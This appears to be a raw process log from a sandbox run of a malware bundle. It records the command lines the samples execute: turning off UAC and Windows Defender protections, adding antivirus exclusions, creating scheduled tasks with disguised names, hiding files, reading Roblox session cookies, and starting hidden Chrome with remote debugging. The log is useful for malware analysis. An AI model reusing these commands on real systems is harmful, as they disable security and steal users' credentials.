"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\S0HVS2V3W4E3" & exit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\Files\wow.exe
"C:\Users\Admin\Desktop\Files\wow.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 336 -ip 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 336 -s 1732
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\O8GDJEKN7YCJ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"
C:\Users\Admin\Desktop\Files\yiklfON.exe
"C:\Users\Admin\Desktop\Files\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe'
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2
C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe'
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Users\Admin\Desktop\Files\W4KLQf7.exe
"C:\Users\Admin\Desktop\Files\W4KLQf7.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3560 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7804 -ip 7804
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 984
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp" /SL5="$604C2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 2260
C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe
"C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5792 -ip 5792
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 816
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe"
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Users\Admin\Desktop\Files\steal_stub.exe
"C:\Users\Admin\Desktop\Files\steal_stub.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"
C:\Users\Admin\Desktop\Files\yiklfON.exe
"C:\Users\Admin\Desktop\Files\yiklfON.exe"
C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe
"C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"
C:\Users\Admin\Desktop\Files\steal_stub.exe
"C:\Users\Admin\Desktop\Files\steal_stub.exe"
C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe
"C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Users\Admin\Desktop\Files\file.exe
"C:\Users\Admin\Desktop\Files\file.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Oi8sKAHNLo7W.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9586.tmp\9587.tmp\9588.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
